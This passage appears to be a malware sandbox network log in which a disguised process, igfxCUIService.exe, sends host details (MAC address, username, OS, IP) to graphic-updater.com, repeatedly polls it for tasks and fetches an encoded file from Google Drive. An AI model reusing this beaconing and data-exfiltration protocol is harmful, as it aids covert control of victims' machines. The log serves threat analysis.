                                        Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
                                        Connection: close
                                        Transfer-Encoding: chunked
                                        2022-01-11 16:09:17 UTC16INData Raw: 31 37 39 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 6b 2d 32 6f 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 6f 74 33 33
                                        Data Ascii: 179<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-0k-2o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ot33
                                        2022-01-11 16:09:17 UTC16INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        19192.168.2.44981223.254.131.176443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:17 UTC14OUTPOST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:17 UTC14OUTData Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:17 UTC16INHTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:17 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 43
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:17 UTC17INData Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        2192.168.2.44979523.254.131.176443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:03 UTC6OUTPOST /api/attach HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 136
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:03 UTC6OUTData Raw: 73 65 72 69 61 6c 3d 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 5f 5f 6a 6f 6e 65 73 26 6e 61 6d 65 3d 6a 6f 6e 65 73 26 75 73 65 72 5f 74 6f 6b 65 6e 3d 38 37 32 33 34 37 38 38 37 33 34 38 37 26 6f 73 3d 20 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 20 36 34 2d 62 69 74 20 31 30 2e 30 2e 31 37 31 33 34 26 61 6e 74 69 3d 26 69 70 3d 31 39 32 2e 31 36 38 2e 32 2e 34
                                        Data Ascii: serial=EC-F4-BB-EA-15-88__user&name=user&user_token=8723478873487&os= Microsoft Windows 10 Pro 64-bit 10.0.17134&anti=&ip=192.168.2.4
                                        2022-01-11 16:09:04 UTC6INHTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:04 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 59
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 48
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:04 UTC6INData Raw: 7b 22 74 6f 6b 65 6e 22 3a 22 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34 22 7d
                                        Data Ascii: {"token":"dda3e326-462d-4082-a6bd-07c7f1afd764"}


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        20192.168.2.449813142.250.185.129443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:17 UTC16OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ot3340k8gdd9p4c62g2sf2iqkmc81t1u/1641917325000/15598710561884722261/*/1W64PQQxrwY3XjBnv_QAeBQu-ePr537eu HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 0
                                        Host: doc-0k-2o-docs.googleusercontent.com
                                        2022-01-11 16:09:17 UTC17INHTTP/1.1 200 OK
                                        X-GUploader-UploadID: ADPycduFvXnpZlScVrvLpqLxxDaD7GG54hSUwAKYYOx4lHJX0IUvcpVVstorfp5CFC6eM2F3hH6sq3aC3hrWtHg-tEKQdWuXhg
                                        Access-Control-Allow-Origin: *
                                        Access-Control-Allow-Credentials: false
                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment
                                        Access-Control-Allow-Methods: GET,OPTIONS
                                        Content-Type: text/plain
                                        Content-Disposition: attachment;filename="domain.txt";filename*=UTF-8''domain.txt
                                        Content-Length: 56
                                        Date: Tue, 11 Jan 2022 16:09:17 GMT
                                        Expires: Tue, 11 Jan 2022 16:09:17 GMT
                                        Cache-Control: private, max-age=0
                                        X-Goog-Hash: crc32c=zkaohA==
                                        Server: UploadServer
                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                        Connection: close
                                        2022-01-11 16:09:17 UTC20INData Raw: 4e 6d 73 6a 43 53 41 67 57 53 6c 68 61 56 4d 76 4a 7a 30 53 51 48 35 2b 61 69 55 7a 4d 43 55 70 4b 46 64 71 4f 7a 45 67 49 6a 59 4d 49 32 55 68 43 44 78 6d 46 67 3d 3d
                                        Data Ascii: NmsjCSAgWSlhaVMvJz0SQH5+aiUzMCUpKFdqOzEgIjYMI2UhCDxmFg==


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        21192.168.2.44981423.254.131.176443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:18 UTC20OUTPOST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:18 UTC21OUTData Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:18 UTC21INHTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:18 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 42
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:18 UTC21INData Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        22192.168.2.44981523.254.131.176443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:18 UTC21OUTPOST /api/attach HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 136
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:18 UTC21OUTData Raw: 73 65 72 69 61 6c 3d 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 5f 5f 6a 6f 6e 65 73 26 6e 61 6d 65 3d 6a 6f 6e 65 73 26 75 73 65 72 5f 74 6f 6b 65 6e 3d 38 37 32 33 34 37 38 38 37 33 34 38 37 26 6f 73 3d 20 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 20 36 34 2d 62 69 74 20 31 30 2e 30 2e 31 37 31 33 34 26 61 6e 74 69 3d 26 69 70 3d 31 39 32 2e 31 36 38 2e 32 2e 34
                                        Data Ascii: serial=EC-F4-BB-EA-15-88__user&name=user&user_token=8723478873487&os= Microsoft Windows 10 Pro 64-bit 10.0.17134&anti=&ip=192.168.2.4
                                        2022-01-11 16:09:18 UTC21INHTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:18 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 41
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 48
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:18 UTC21INData Raw: 7b 22 74 6f 6b 65 6e 22 3a 22 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34 22 7d
                                        Data Ascii: {"token":"dda3e326-462d-4082-a6bd-07c7f1afd764"}


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        23192.168.2.44981623.254.131.176443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:19 UTC21OUTPOST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:19 UTC22OUTData Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:19 UTC22INHTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:19 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 40
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:19 UTC22INData Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        24192.168.2.44981723.254.131.176443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:19 UTC22OUTPOST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:19 UTC22OUTData Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:19 UTC22INHTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:19 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 39
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:19 UTC22INData Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        25192.168.2.44981823.254.131.176443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:19 UTC22OUTPOST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:19 UTC23OUTData Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:20 UTC23INHTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:20 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 38
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:20 UTC23INData Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        26192.168.2.44981923.254.131.176443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:20 UTC23OUTPOST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:20 UTC23OUTData Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:20 UTC23INHTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:20 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 37
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:20 UTC23INData Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        27192.168.2.44982023.254.131.176443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:20 UTC23OUTPOST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:20 UTC24OUTData Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:21 UTC24INHTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:20 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 36
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:21 UTC24INData Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        28192.168.2.44982123.254.131.176443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:20 UTC24OUTPOST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:20 UTC24OUTData Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:21 UTC24INHTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:21 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 35
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:21 UTC24INData Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        29192.168.2.44982223.254.131.176443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:21 UTC24OUTPOST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:21 UTC25OUTData Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:21 UTC25INHTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:21 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 34
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:21 UTC25INData Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        3192.168.2.44979623.254.131.176443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:04 UTC6OUTPOST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:04 UTC7OUTData Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:05 UTC7INHTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:04 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 58
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:05 UTC7INData Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        30192.168.2.44982323.254.131.176443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:21 UTC25OUTPOST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:21 UTC25OUTData Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:22 UTC25INHTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:22 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 33
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:22 UTC25INData Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        31192.168.2.44982423.254.131.176443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:22 UTC25OUTPOST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:22 UTC26OUTData Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:22 UTC26INHTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:22 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 32
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:22 UTC26INData Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        32192.168.2.44982523.254.131.176443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:23 UTC26OUTPOST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:23 UTC26OUTData Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:23 UTC26INHTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:23 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 31
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:23 UTC27INData Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        33192.168.2.44982623.254.131.176443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:23 UTC26OUTPOST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:23 UTC26OUTData Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:23 UTC27INHTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:23 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 30
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:23 UTC27INData Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        34192.168.2.44982723.254.131.176443C:\ProgramData\SystemData\igfxCUIService.exe
                                        TimestampkBytes transferredDirectionData
                                        2022-01-11 16:09:23 UTC27OUTPOST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
